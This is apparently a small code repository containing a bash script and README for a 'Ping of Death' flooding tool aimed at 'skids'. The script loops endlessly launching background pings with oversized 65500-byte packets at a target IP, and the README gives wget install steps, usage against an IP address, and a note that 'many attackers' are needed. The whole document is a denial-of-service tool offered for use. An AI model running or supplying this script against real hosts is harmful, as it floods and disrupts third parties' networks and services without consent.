├── pod └── README.md /pod: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | while true; do 4 | ping $1 -s 65500 & 5 | done 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ping of Death 2 | A simple and easy tool for skids to preform p.o.d. attacks 3 | 4 | ## How to Install 5 | Run 'wget https://raw.githubusercontent.com/4k-developer/Ping_of_Death/master/pod && sudo chmod +x pod && sudo mv pod /usr/bin/' without the quotes 6 | 7 | ## How to Use 8 | pod (ip address) 9 | 10 | ## How to Kill 11 | Use 'pkill ping' 12 | 13 | ## What you Need 14 | 1) Ping 15 | 2) A terminal 16 | 3) Target 17 | 4) Many attackers 18 | --------------------------------------------------------------------------------